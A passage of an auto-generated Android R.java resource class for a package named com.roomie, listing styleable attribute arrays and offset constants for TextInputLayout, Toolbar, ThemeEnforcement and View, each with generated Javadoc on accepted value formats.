/** <p>This symbol is the offset where the {@link com.roomie.R.attr#helperText} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:helperText */ public static final int TextInputLayout_helperText = 5; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#helperTextEnabled} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:helperTextEnabled */ public static final int TextInputLayout_helperTextEnabled = 6; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#helperTextTextAppearance} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:helperTextTextAppearance */ public static final int TextInputLayout_helperTextTextAppearance = 7; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#hintAnimationEnabled} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:hintAnimationEnabled */ public static final int TextInputLayout_hintAnimationEnabled = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#hintEnabled} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:hintEnabled */ public static final int TextInputLayout_hintEnabled = 2; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#hintTextAppearance} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:hintTextAppearance */ public static final int TextInputLayout_hintTextAppearance = 4; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#passwordToggleContentDescription} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:passwordToggleContentDescription */ public static final int TextInputLayout_passwordToggleContentDescription = 16; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#passwordToggleDrawable} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:passwordToggleDrawable */ public static final int TextInputLayout_passwordToggleDrawable = 15; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#passwordToggleEnabled} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:passwordToggleEnabled */ public static final int TextInputLayout_passwordToggleEnabled = 14; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#passwordToggleTint} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:passwordToggleTint */ public static final int TextInputLayout_passwordToggleTint = 17; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#passwordToggleTintMode} attribute's value can be found in the {@link #TextInputLayout} array. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td></td></tr> <tr><td><code>src_in</code></td><td>5</td><td></td></tr> <tr><td><code>src_atop</code></td><td>9</td><td></td></tr> <tr><td><code>multiply</code></td><td>14</td><td></td></tr> <tr><td><code>screen</code></td><td>15</td><td></td></tr> </table> @attr name com.roomie:passwordToggleTintMode */ public static final int TextInputLayout_passwordToggleTintMode = 18; /** Attributes that can be used with a ThemeEnforcement. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #ThemeEnforcement_android_textAppearance android:textAppearance}</code></td><td></td></tr> <tr><td><code>{@link #ThemeEnforcement_enforceMaterialTheme com.roomie:enforceMaterialTheme}</code></td><td></td></tr> <tr><td><code>{@link #ThemeEnforcement_enforceTextAppearance com.roomie:enforceTextAppearance}</code></td><td></td></tr> </table> @see #ThemeEnforcement_android_textAppearance @see #ThemeEnforcement_enforceMaterialTheme @see #ThemeEnforcement_enforceTextAppearance */ public static final int[] ThemeEnforcement = { 0x01010034, 0x7f0101da, 0x7f0101db }; /** <p>This symbol is the offset where the {@link android.R.attr#textAppearance} attribute's value can be found in the {@link #ThemeEnforcement} array. @attr name android:textAppearance */ public static final int ThemeEnforcement_android_textAppearance = 0; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#enforceMaterialTheme} attribute's value can be found in the {@link #ThemeEnforcement} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:enforceMaterialTheme */ public static final int ThemeEnforcement_enforceMaterialTheme = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#enforceTextAppearance} attribute's value can be found in the {@link #ThemeEnforcement} array. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:enforceTextAppearance */ public static final int ThemeEnforcement_enforceTextAppearance = 2; /** Attributes that can be used with a Toolbar. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #Toolbar_android_gravity android:gravity}</code></td><td></td></tr> <tr><td><code>{@link #Toolbar_android_minHeight android:minHeight}</code></td><td></td></tr> <tr><td><code>{@link #Toolbar_buttonGravity com.roomie:buttonGravity}</code></td><td></td></tr> <tr><td><code>{@link #Toolbar_collapseContentDescription com.roomie:collapseContentDescription}</code></td><td> Text to set as the content description for the collapse button.</td></tr> <tr><td><code>{@link #Toolbar_collapseIcon com.roomie:collapseIcon}</code></td><td> Icon drawable to use for the collapse button.</td></tr> <tr><td><code>{@link #Toolbar_contentInsetEnd com.roomie:contentInsetEnd}</code></td><td> Minimum inset for content views within a bar.</td></tr> <tr><td><code>{@link #Toolbar_contentInsetEndWithActions com.roomie:contentInsetEndWithActions}</code></td><td> Minimum inset for content views within a bar when actions from a menu are present.</td></tr> <tr><td><code>{@link #Toolbar_contentInsetLeft com.roomie:contentInsetLeft}</code></td><td> Minimum inset for content views within a bar.</td></tr> <tr><td><code>{@link #Toolbar_contentInsetRight com.roomie:contentInsetRight}</code></td><td> Minimum inset for content views within a bar.</td></tr> <tr><td><code>{@link #Toolbar_contentInsetStart com.roomie:contentInsetStart}</code></td><td> Minimum inset for content views within a bar.</td></tr> <tr><td><code>{@link #Toolbar_contentInsetStartWithNavigation com.roomie:contentInsetStartWithNavigation}</code></td><td> Minimum inset for content views within a bar when a navigation button is present, such as the Up button.</td></tr> <tr><td><code>{@link #Toolbar_logo com.roomie:logo}</code></td><td> Drawable to set as the logo that appears at the starting side of the Toolbar, just after the navigation button.</td></tr> <tr><td><code>{@link #Toolbar_logoDescription com.roomie:logoDescription}</code></td><td> A content description string to describe the appearance of the associated logo image.</td></tr> <tr><td><code>{@link #Toolbar_maxButtonHeight com.roomie:maxButtonHeight}</code></td><td></td></tr> <tr><td><code>{@link #Toolbar_navigationContentDescription com.roomie:navigationContentDescription}</code></td><td> Text to set as the content description for the navigation button located at the start of the toolbar.</td></tr> <tr><td><code>{@link #Toolbar_navigationIcon com.roomie:navigationIcon}</code></td><td> Icon drawable to use for the navigation button located at the start of the toolbar.</td></tr> <tr><td><code>{@link #Toolbar_popupTheme com.roomie:popupTheme}</code></td><td> Reference to a theme that should be used to inflate popups shown by widgets in the toolbar.</td></tr> <tr><td><code>{@link #Toolbar_subtitle com.roomie:subtitle}</code></td><td> Specifies subtitle text used for navigationMode="normal" </td></tr> <tr><td><code>{@link #Toolbar_subtitleTextAppearance com.roomie:subtitleTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #Toolbar_subtitleTextColor com.roomie:subtitleTextColor}</code></td><td> A color to apply to the subtitle string.</td></tr> <tr><td><code>{@link #Toolbar_title com.roomie:title}</code></td><td></td></tr> <tr><td><code>{@link #Toolbar_titleMargin com.roomie:titleMargin}</code></td><td> Specifies extra space on the left, start, right and end sides of the toolbar's title.</td></tr> <tr><td><code>{@link #Toolbar_titleMarginBottom com.roomie:titleMarginBottom}</code></td><td> Specifies extra space on the bottom side of the toolbar's title.</td></tr> <tr><td><code>{@link #Toolbar_titleMarginEnd com.roomie:titleMarginEnd}</code></td><td> Specifies extra space on the end side of the toolbar's title.</td></tr> <tr><td><code>{@link #Toolbar_titleMarginStart com.roomie:titleMarginStart}</code></td><td> Specifies extra space on the start side of the toolbar's title.</td></tr> <tr><td><code>{@link #Toolbar_titleMarginTop com.roomie:titleMarginTop}</code></td><td> Specifies extra space on the top side of the toolbar's title.</td></tr> <tr><td><code>{@link #Toolbar_titleMargins com.roomie:titleMargins}</code></td><td> {@deprecated Use titleMargin} </td></tr> <tr><td><code>{@link #Toolbar_titleTextAppearance com.roomie:titleTextAppearance}</code></td><td></td></tr> <tr><td><code>{@link #Toolbar_titleTextColor com.roomie:titleTextColor}</code></td><td> A color to apply to the title string.</td></tr> </table> @see #Toolbar_android_gravity @see #Toolbar_android_minHeight @see #Toolbar_buttonGravity @see #Toolbar_collapseContentDescription @see #Toolbar_collapseIcon @see #Toolbar_contentInsetEnd @see #Toolbar_contentInsetEndWithActions @see #Toolbar_contentInsetLeft @see #Toolbar_contentInsetRight @see #Toolbar_contentInsetStart @see #Toolbar_contentInsetStartWithNavigation @see #Toolbar_logo @see #Toolbar_logoDescription @see #Toolbar_maxButtonHeight @see #Toolbar_navigationContentDescription @see #Toolbar_navigationIcon @see #Toolbar_popupTheme @see #Toolbar_subtitle @see #Toolbar_subtitleTextAppearance @see #Toolbar_subtitleTextColor @see #Toolbar_title @see #Toolbar_titleMargin @see #Toolbar_titleMarginBottom @see #Toolbar_titleMarginEnd @see #Toolbar_titleMarginStart @see #Toolbar_titleMarginTop @see #Toolbar_titleMargins @see #Toolbar_titleTextAppearance @see #Toolbar_titleTextColor */ public static final int[] Toolbar = { 0x010100af, 0x01010140, 0x7f01002c, 0x7f01002f, 0x7f010033, 0x7f01003f, 0x7f010040, 0x7f010041, 0x7f010042, 0x7f010043, 0x7f010044, 0x7f010046, 0x7f01010e, 0x7f01010f, 0x7f010110, 0x7f010111, 0x7f010112, 0x7f010113, 0x7f010114, 0x7f010115, 0x7f010116, 0x7f010117, 0x7f010118, 0x7f010119, 0x7f01011a, 0x7f01011b, 0x7f01011c, 0x7f01011d, 0x7f01011e }; /** <p>This symbol is the offset where the {@link android.R.attr#gravity} attribute's value can be found in the {@link #Toolbar} array. @attr name android:gravity */ public static final int Toolbar_android_gravity = 0; /** <p>This symbol is the offset where the {@link android.R.attr#minHeight} attribute's value can be found in the {@link #Toolbar} array. @attr name android:minHeight */ public static final int Toolbar_android_minHeight = 1; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#buttonGravity} attribute's value can be found in the {@link #Toolbar} array. <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>top</code></td><td>0x30</td><td> Push object to the top of its container, not changing its size. </td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td> Push object to the bottom of its container, not changing its size. </td></tr> </table> @attr name com.roomie:buttonGravity */ public static final int Toolbar_buttonGravity = 21; /** <p> @attr description Text to set as the content description for the collapse button. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:collapseContentDescription */ public static final int Toolbar_collapseContentDescription = 23; /** <p> @attr description Icon drawable to use for the collapse button. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:collapseIcon */ public static final int Toolbar_collapseIcon = 22; /** <p> @attr description Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetEnd */ public static final int Toolbar_contentInsetEnd = 6; /** <p> @attr description Minimum inset for content views within a bar when actions from a menu are present. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetEndWithActions */ public static final int Toolbar_contentInsetEndWithActions = 10; /** <p> @attr description Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetLeft */ public static final int Toolbar_contentInsetLeft = 7; /** <p> @attr description Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetRight */ public static final int Toolbar_contentInsetRight = 8; /** <p> @attr description Minimum inset for content views within a bar. Navigation buttons and menu views are excepted. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetStart */ public static final int Toolbar_contentInsetStart = 5; /** <p> @attr description Minimum inset for content views within a bar when a navigation button is present, such as the Up button. Only valid for some themes and configurations. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:contentInsetStartWithNavigation */ public static final int Toolbar_contentInsetStartWithNavigation = 9; /** <p> @attr description Drawable to set as the logo that appears at the starting side of the Toolbar, just after the navigation button. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:logo */ public static final int Toolbar_logo = 4; /** <p> @attr description A content description string to describe the appearance of the associated logo image. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:logoDescription */ public static final int Toolbar_logoDescription = 26; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#maxButtonHeight} attribute's value can be found in the {@link #Toolbar} array. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:maxButtonHeight */ public static final int Toolbar_maxButtonHeight = 20; /** <p> @attr description Text to set as the content description for the navigation button located at the start of the toolbar. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:navigationContentDescription */ public static final int Toolbar_navigationContentDescription = 25; /** <p> @attr description Icon drawable to use for the navigation button located at the start of the toolbar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:navigationIcon */ public static final int Toolbar_navigationIcon = 24; /** <p> @attr description Reference to a theme that should be used to inflate popups shown by widgets in the toolbar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr name com.roomie:popupTheme */ public static final int Toolbar_popupTheme = 11; /** <p> @attr description Specifies subtitle text used for navigationMode="normal" <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:subtitle */ public static final int Toolbar_subtitle = 3; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#subtitleTextAppearance} attribute's value can be found in the {@link #Toolbar} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:subtitleTextAppearance */ public static final int Toolbar_subtitleTextAppearance = 13; /** <p> @attr description A color to apply to the subtitle string. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:subtitleTextColor */ public static final int Toolbar_subtitleTextColor = 28; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#title} attribute's value can be found in the {@link #Toolbar} array. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. @attr name com.roomie:title */ public static final int Toolbar_title = 2; /** <p> @attr description Specifies extra space on the left, start, right and end sides of the toolbar's title. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:titleMargin */ public static final int Toolbar_titleMargin = 14; /** <p> @attr description Specifies extra space on the bottom side of the toolbar's title. If both this attribute and titleMargin are specified, then this attribute takes precedence. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:titleMarginBottom */ public static final int Toolbar_titleMarginBottom = 18; /** <p> @attr description Specifies extra space on the end side of the toolbar's title. If both this attribute and titleMargin are specified, then this attribute takes precedence. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:titleMarginEnd */ public static final int Toolbar_titleMarginEnd = 16; /** <p> @attr description Specifies extra space on the start side of the toolbar's title. If both this attribute and titleMargin are specified, then this attribute takes precedence. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:titleMarginStart */ public static final int Toolbar_titleMarginStart = 15; /** <p> @attr description Specifies extra space on the top side of the toolbar's title. If both this attribute and titleMargin are specified, then this attribute takes precedence. Margin values should be positive. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:titleMarginTop */ public static final int Toolbar_titleMarginTop = 17; /** <p> @attr description {@deprecated Use titleMargin} <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:titleMargins */ @Deprecated public static final int Toolbar_titleMargins = 19; /** <p>This symbol is the offset where the {@link com.roomie.R.attr#titleTextAppearance} attribute's value can be found in the {@link #Toolbar} array. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". @attr name com.roomie:titleTextAppearance */ public static final int Toolbar_titleTextAppearance = 12; /** <p> @attr description A color to apply to the title string. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:titleTextColor */ public static final int Toolbar_titleTextColor = 27; /** Attributes that can be used with a View. <p>Includes the following attributes:</p> <table> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Attribute</th><th>Description</th></tr> <tr><td><code>{@link #View_android_focusable android:focusable}</code></td><td> Boolean that controls whether a view can take focus.</td></tr> <tr><td><code>{@link #View_android_theme android:theme}</code></td><td> Specifies a theme override for a view.</td></tr> <tr><td><code>{@link #View_paddingEnd com.roomie:paddingEnd}</code></td><td> Sets the padding, in pixels, of the end edge; see {@link android.R.attr#padding}.</td></tr> <tr><td><code>{@link #View_paddingStart com.roomie:paddingStart}</code></td><td> Sets the padding, in pixels, of the start edge; see {@link android.R.attr#padding}.</td></tr> <tr><td><code>{@link #View_theme com.roomie:theme}</code></td><td> Deprecated.</td></tr> </table> @see #View_android_focusable @see #View_android_theme @see #View_paddingEnd @see #View_paddingStart @see #View_theme */ public static final int[] View = { 0x01010000, 0x010100da, 0x7f01011f, 0x7f010120, 0x7f010121 }; /** <p> @attr description Boolean that controls whether a view can take focus. By default the user can not move focus to a view; by setting this attribute to true the view is allowed to take focus. This value does not impact the behavior of directly calling {@link android.view.View#requestFocus}, which will always request focus regardless of this view. It only impacts where focus navigation will try to move focus. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#focusable}. @attr name android:focusable */ public static final int View_android_focusable = 1; /** <p> @attr description Specifies a theme override for a view. When a theme override is set, the view will be inflated using a {@link android.content.Context} themed with the specified resource. <p>This corresponds to the global attribute resource symbol {@link android.R.attr#theme}. @attr name android:theme */ public static final int View_android_theme = 0; /** <p> @attr description Sets the padding, in pixels, of the end edge; see {@link android.R.attr#padding}. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:paddingEnd */ public static final int View_paddingEnd = 3; /** <p> @attr description Sets the padding, in pixels, of the start edge; see {@link android.R.attr#padding}. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>This is a private symbol. @attr name com.roomie:paddingStart */ public static final int View_paddingStart = 2; /** <p> @attr description Deprecated. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>This is a private symbol. @attr 